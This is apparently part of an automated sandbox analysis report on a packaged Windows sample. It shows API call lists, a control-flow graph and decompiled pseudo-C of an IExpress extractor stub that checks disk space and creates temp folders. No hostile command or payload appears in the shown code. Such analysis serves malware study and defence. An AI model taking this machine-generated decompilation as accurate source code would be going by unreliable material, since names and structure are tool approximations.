                                                                                                                                                                                                                                            0x00a05811
                                                                                                                                                                                                                                            0x00a05817
                                                                                                                                                                                                                                            0x00a05819
                                                                                                                                                                                                                                            0x00a0581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0581f
                                                                                                                                                                                                                                            0x00a05791
                                                                                                                                                                                                                                            0x00a05797
                                                                                                                                                                                                                                            0x00a0579c
                                                                                                                                                                                                                                            0x00a0579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a057a0
                                                                                                                                                                                                                                            0x00a057a9
                                                                                                                                                                                                                                            0x00a057ae
                                                                                                                                                                                                                                            0x00a057b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a057b0
                                                                                                                                                                                                                                            0x00a0579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05769
                                                                                                                                                                                                                                            0x00a05762
                                                                                                                                                                                                                                            0x00a05753
                                                                                                                                                                                                                                            0x00a0574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05864
                                                                                                                                                                                                                                            0x00a05717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056c3
                                                                                                                                                                                                                                            0x00a056c5
                                                                                                                                                                                                                                            0x00a056c9
                                                                                                                                                                                                                                            0x00a056ce
                                                                                                                                                                                                                                            0x00a056d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056d6
                                                                                                                                                                                                                                            0x00a056d6
                                                                                                                                                                                                                                            0x00a056d8
                                                                                                                                                                                                                                            0x00a056dd
                                                                                                                                                                                                                                            0x00a056df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056e1
                                                                                                                                                                                                                                            0x00a056e2
                                                                                                                                                                                                                                            0x00a056e4
                                                                                                                                                                                                                                            0x00a056e6
                                                                                                                                                                                                                                            0x00a056eb
                                                                                                                                                                                                                                            0x00a056ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0586c
                                                                                                                                                                                                                                            0x00a05878
                                                                                                                                                                                                                                            0x00a0587e
                                                                                                                                                                                                                                            0x00a05882
                                                                                                                                                                                                                                            0x00a05883
                                                                                                                                                                                                                                            0x00a05889
                                                                                                                                                                                                                                            0x00a0588e
                                                                                                                                                                                                                                            0x00a0588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05896
                                                                                                                                                                                                                                            0x00a056ed
                                                                                                                                                                                                                                            0x00a056df
                                                                                                                                                                                                                                            0x00a056d0
                                                                                                                                                                                                                                            0x00a056c1
                                                                                                                                                                                                                                            0x00a056a8
                                                                                                                                                                                                                                            0x00a0565b
                                                                                                                                                                                                                                            0x00a0565b
                                                                                                                                                                                                                                            0x00a0565d
                                                                                                                                                                                                                                            0x00a05669
                                                                                                                                                                                                                                            0x00a05669
                                                                                                                                                                                                                                            0x00a0565f
                                                                                                                                                                                                                                            0x00a0565f
                                                                                                                                                                                                                                            0x00a05665
                                                                                                                                                                                                                                            0x00a05667
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05667
                                                                                                                                                                                                                                            0x00a0566c
                                                                                                                                                                                                                                            0x00a05673
                                                                                                                                                                                                                                            0x00a05678
                                                                                                                                                                                                                                            0x00a0567a
                                                                                                                                                                                                                                            0x00a0589b
                                                                                                                                                                                                                                            0x00a0589b
                                                                                                                                                                                                                                            0x00a05680
                                                                                                                                                                                                                                            0x00a05685
                                                                                                                                                                                                                                            0x00a0568c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0568c
                                                                                                                                                                                                                                            0x00a0567a
                                                                                                                                                                                                                                            0x00a0560e
                                                                                                                                                                                                                                            0x00a05613
                                                                                                                                                                                                                                            0x00a0561a
                                                                                                                                                                                                                                            0x00a05620
                                                                                                                                                                                                                                            0x00a05626
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05626
                                                                                                                                                                                                                                            0x00a055db
                                                                                                                                                                                                                                            0x00a055e0
                                                                                                                                                                                                                                            0x00a055e7
                                                                                                                                                                                                                                            0x00a055f1
                                                                                                                                                                                                                                            0x00a055f6
                                                                                                                                                                                                                                            0x00a055f6
                                                                                                                                                                                                                                            0x00a055f6
                                                                                                                                                                                                                                            0x00a058b7
                                                                                                                                                                                                                                            0x00a058c7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A055CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A05638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A0564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A05620
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A056B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A0571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A05737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A057CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A057EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A05802
                                                                                                                                                                                                                                              • Part of subcall function 00A02630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A02654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A05830
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                              • Part of subcall function 00A06517: FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A05878
                                                                                                                                                                                                                                              • Part of subcall function 00A0597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A059A8
                                                                                                                                                                                                                                              • Part of subcall function 00A0597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A059AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-1384155332
                                                                                                                                                                                                                                            • Opcode ID: 957bd7355d4285a2e877fbb9bbcedbde817ce41acb06a5cbc8b328dda98ce7ef
                                                                                                                                                                                                                                            • Instruction ID: ad37b95ac732ff0f60072756650757da854df5972ec00e1b6e09b5eacdaf2020
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 957bd7355d4285a2e877fbb9bbcedbde817ce41acb06a5cbc8b328dda98ce7ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 908105B0E04A0C9BDB20ABB4BD85BEB726DAF64340F4444A5F986D21D1EF748DC78E51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 324 a0597d-a059b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a059bb-a059d8 call a044b9 call a06285 324->325 326 a059dd-a05a1b GetDiskFreeSpaceA 324->326 341 a05c05-a05c14 call a06ce0 325->341 327 a05ba1-a05bde memset call a06285 GetLastError FormatMessageA 326->327 328 a05a21-a05a4a MulDiv 326->328 337 a05be3-a05bfc call a044b9 SetCurrentDirectoryA 327->337 328->327 331 a05a50-a05a6c GetVolumeInformationA 328->331 334 a05ab5-a05aca SetCurrentDirectoryA 331->334 335 a05a6e-a05ab0 memset call a06285 GetLastError FormatMessageA 331->335 339 a05acc-a05ad1 334->339 335->337 351 a05c02 337->351 344 a05ae2-a05ae4 339->344 345 a05ad3-a05ad8 339->345 349 a05ae6 344->349 350 a05ae7-a05af8 344->350 345->344 347 a05ada-a05ae0 345->347 347->339 347->344 349->350 353 a05af9-a05afb 350->353 354 a05c04 351->354 355 a05b05-a05b08 353->355 356 a05afd-a05b03 353->356 354->341 357 a05b20-a05b27 355->357 358 a05b0a-a05b1b call a044b9 355->358 356->353 356->355 360 a05b52-a05b5b 357->360 361 a05b29-a05b33 357->361 358->351 364 a05b62-a05b6d 360->364 361->360 363 a05b35-a05b50 361->363 363->364 365 a05b76-a05b7d 364->365 366 a05b6f-a05b74 364->366 368 a05b83 365->368 369 a05b7f-a05b81 365->369 367 a05b85 366->367 370 a05b96-a05b9f 367->370 371 a05b87-a05b94 call a0268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                            			E00A0597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v788;
                                                                                                                                                                                                                                            				long _v792;
                                                                                                                                                                                                                                            				long _v796;
                                                                                                                                                                                                                                            				long _v800;
                                                                                                                                                                                                                                            				signed int _v804;
                                                                                                                                                                                                                                            				long _v808;
                                                                                                                                                                                                                                            				int _v812;
                                                                                                                                                                                                                                            				long _v816;
                                                                                                                                                                                                                                            				long _v820;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                                                                                            				signed short _t78;
                                                                                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				int _t102;
                                                                                                                                                                                                                                            				unsigned int _t103;
                                                                                                                                                                                                                                            				unsigned int _t105;
                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                            				long _t112;
                                                                                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				signed int _t119;
                                                                                                                                                                                                                                            				signed int _t120;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t114 = __edi;
                                                                                                                                                                                                                                            				_t46 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                            				_v804 = __edx;
                                                                                                                                                                                                                                            				_t118 = __ecx;
                                                                                                                                                                                                                                            				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                            				if(_t50 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					_v796 = 0;
                                                                                                                                                                                                                                            					_v792 = 0;
                                                                                                                                                                                                                                            					_v800 = 0;
                                                                                                                                                                                                                                            					_v808 = 0;
                                                                                                                                                                                                                                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                                                                                            					if(_t55 == 0) {
                                                                                                                                                                                                                                            						L29:
                                                                                                                                                                                                                                            						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            						 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            						_t110 = 0x4b0;
                                                                                                                                                                                                                                            						L30:
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						E00A044B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                            						L31:
                                                                                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                                            						L32:
                                                                                                                                                                                                                                            						_pop(_t114);
                                                                                                                                                                                                                                            						goto L33;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                            					_v812 = _t69;
                                                                                                                                                                                                                                            					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                            					__eflags = _t116;
                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                            						goto L29;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                                                                                            					if(_t73 != 0) {
                                                                                                                                                                                                                                            						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                            						_t101 =  &_v16;
                                                                                                                                                                                                                                            						_t111 = 6;
                                                                                                                                                                                                                                            						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                            							__eflags = _t22;
                                                                                                                                                                                                                                            							if(_t22 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                            							__eflags = _t87;
                                                                                                                                                                                                                                            							if(_t87 == 0) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *_t101 = _t87;
                                                                                                                                                                                                                                            							_t101 = _t101 + 1;
                                                                                                                                                                                                                                            							_t111 = _t111 - 1;
                                                                                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                                                                                            							if(_t111 != 0) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t111;
                                                                                                                                                                                                                                            						if(_t111 == 0) {
                                                                                                                                                                                                                                            							_t101 = _t101 - 1;
                                                                                                                                                                                                                                            							__eflags = _t101;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t101 = 0;
                                                                                                                                                                                                                                            						_t112 = 0x200;
                                                                                                                                                                                                                                            						_t102 = _v812;
                                                                                                                                                                                                                                            						_t78 = 0;
                                                                                                                                                                                                                                            						_t118 = 8;
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                            							if(_t102 == _t112) {
                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                            							_t78 = _t78 + 1;
                                                                                                                                                                                                                                            							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            							if(_t78 < _t118) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                            						if(_t78 != _t118) {
                                                                                                                                                                                                                                            							__eflags =  *0xa09a34 & 0x00000008;
                                                                                                                                                                                                                                            							if(( *0xa09a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                                            								_t103 =  *0xa09a38; // 0x0
                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                                            								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                            								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                            									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                            									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									 *0xa09124 = 0;
                                                                                                                                                                                                                                            									_t66 = 1;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t66 = E00A0268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                            							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t105 =  *0xa09a38; // 0x0
                                                                                                                                                                                                                                            							_t110 =  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                            							_t103 = (_t105 >> 2) +  *0xa09a38;
                                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t110 = 0x4c5;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A06CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a0597d
                                                                                                                                                                                                                                            0x00a05988
                                                                                                                                                                                                                                            0x00a0598f
                                                                                                                                                                                                                                            0x00a0599a
                                                                                                                                                                                                                                            0x00a059a6
                                                                                                                                                                                                                                            0x00a059a8
                                                                                                                                                                                                                                            0x00a059af
                                                                                                                                                                                                                                            0x00a059b9
                                                                                                                                                                                                                                            0x00a059dd
                                                                                                                                                                                                                                            0x00a059e4
                                                                                                                                                                                                                                            0x00a059f1
                                                                                                                                                                                                                                            0x00a059fe
                                                                                                                                                                                                                                            0x00a05a0b
                                                                                                                                                                                                                                            0x00a05a13
                                                                                                                                                                                                                                            0x00a05a19
                                                                                                                                                                                                                                            0x00a05a1b
                                                                                                                                                                                                                                            0x00a05ba1
                                                                                                                                                                                                                                            0x00a05baf
                                                                                                                                                                                                                                            0x00a05bbd
                                                                                                                                                                                                                                            0x00a05bd8
                                                                                                                                                                                                                                            0x00a05bde
                                                                                                                                                                                                                                            0x00a05be3
                                                                                                                                                                                                                                            0x00a05bec
                                                                                                                                                                                                                                            0x00a05bf0
                                                                                                                                                                                                                                            0x00a05bfc
                                                                                                                                                                                                                                            0x00a05c02
                                                                                                                                                                                                                                            0x00a05c02
                                                                                                                                                                                                                                            0x00a05c02
                                                                                                                                                                                                                                            0x00a05c04
                                                                                                                                                                                                                                            0x00a05c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05c04
                                                                                                                                                                                                                                            0x00a05a27
                                                                                                                                                                                                                                            0x00a05a3a
                                                                                                                                                                                                                                            0x00a05a46
                                                                                                                                                                                                                                            0x00a05a48
                                                                                                                                                                                                                                            0x00a05a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05a64
                                                                                                                                                                                                                                            0x00a05a6a
                                                                                                                                                                                                                                            0x00a05a6c
                                                                                                                                                                                                                                            0x00a05abc
                                                                                                                                                                                                                                            0x00a05ac2
                                                                                                                                                                                                                                            0x00a05ac9
                                                                                                                                                                                                                                            0x00a05aca
                                                                                                                                                                                                                                            0x00a05aca
                                                                                                                                                                                                                                            0x00a05acc
                                                                                                                                                                                                                                            0x00a05acc
                                                                                                                                                                                                                                            0x00a05acf
                                                                                                                                                                                                                                            0x00a05ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05ad3
                                                                                                                                                                                                                                            0x00a05ad6
                                                                                                                                                                                                                                            0x00a05ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05ada
                                                                                                                                                                                                                                            0x00a05adc
                                                                                                                                                                                                                                            0x00a05add
                                                                                                                                                                                                                                            0x00a05add
                                                                                                                                                                                                                                            0x00a05ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05ae0
                                                                                                                                                                                                                                            0x00a05ae2
                                                                                                                                                                                                                                            0x00a05ae4
                                                                                                                                                                                                                                            0x00a05ae6
                                                                                                                                                                                                                                            0x00a05ae6
                                                                                                                                                                                                                                            0x00a05ae6
                                                                                                                                                                                                                                            0x00a05ae9
                                                                                                                                                                                                                                            0x00a05aeb
                                                                                                                                                                                                                                            0x00a05af0
                                                                                                                                                                                                                                            0x00a05af6
                                                                                                                                                                                                                                            0x00a05af8
                                                                                                                                                                                                                                            0x00a05af9
                                                                                                                                                                                                                                            0x00a05af9
                                                                                                                                                                                                                                            0x00a05afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05afd
                                                                                                                                                                                                                                            0x00a05aff
                                                                                                                                                                                                                                            0x00a05b00
                                                                                                                                                                                                                                            0x00a05b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b03
                                                                                                                                                                                                                                            0x00a05b05
                                                                                                                                                                                                                                            0x00a05b08
                                                                                                                                                                                                                                            0x00a05b20
                                                                                                                                                                                                                                            0x00a05b27
                                                                                                                                                                                                                                            0x00a05b52
                                                                                                                                                                                                                                            0x00a05b52
                                                                                                                                                                                                                                            0x00a05b5b
                                                                                                                                                                                                                                            0x00a05b62
                                                                                                                                                                                                                                            0x00a05b6b
                                                                                                                                                                                                                                            0x00a05b6d
                                                                                                                                                                                                                                            0x00a05b76
                                                                                                                                                                                                                                            0x00a05b7d
                                                                                                                                                                                                                                            0x00a05b83
                                                                                                                                                                                                                                            0x00a05b7f
                                                                                                                                                                                                                                            0x00a05b7f
                                                                                                                                                                                                                                            0x00a05b7f
                                                                                                                                                                                                                                            0x00a05b6f
                                                                                                                                                                                                                                            0x00a05b72
                                                                                                                                                                                                                                            0x00a05b72
                                                                                                                                                                                                                                            0x00a05b85
                                                                                                                                                                                                                                            0x00a05b98
                                                                                                                                                                                                                                            0x00a05b9e
                                                                                                                                                                                                                                            0x00a05b87
                                                                                                                                                                                                                                            0x00a05b8f
                                                                                                                                                                                                                                            0x00a05b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b85
                                                                                                                                                                                                                                            0x00a05b29
                                                                                                                                                                                                                                            0x00a05b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b35
                                                                                                                                                                                                                                            0x00a05b48
                                                                                                                                                                                                                                            0x00a05b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b4a
                                                                                                                                                                                                                                            0x00a05b0f
                                                                                                                                                                                                                                            0x00a05b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b16
                                                                                                                                                                                                                                            0x00a05a7c
                                                                                                                                                                                                                                            0x00a05a8a
                                                                                                                                                                                                                                            0x00a05aa5
                                                                                                                                                                                                                                            0x00a05aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a059bb
                                                                                                                                                                                                                                            0x00a059c0
                                                                                                                                                                                                                                            0x00a059c7
                                                                                                                                                                                                                                            0x00a059d1
                                                                                                                                                                                                                                            0x00a059d6
                                                                                                                                                                                                                                            0x00a05c05
                                                                                                                                                                                                                                            0x00a05c14
                                                                                                                                                                                                                                            0x00a05c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A059A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A059AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A05A13
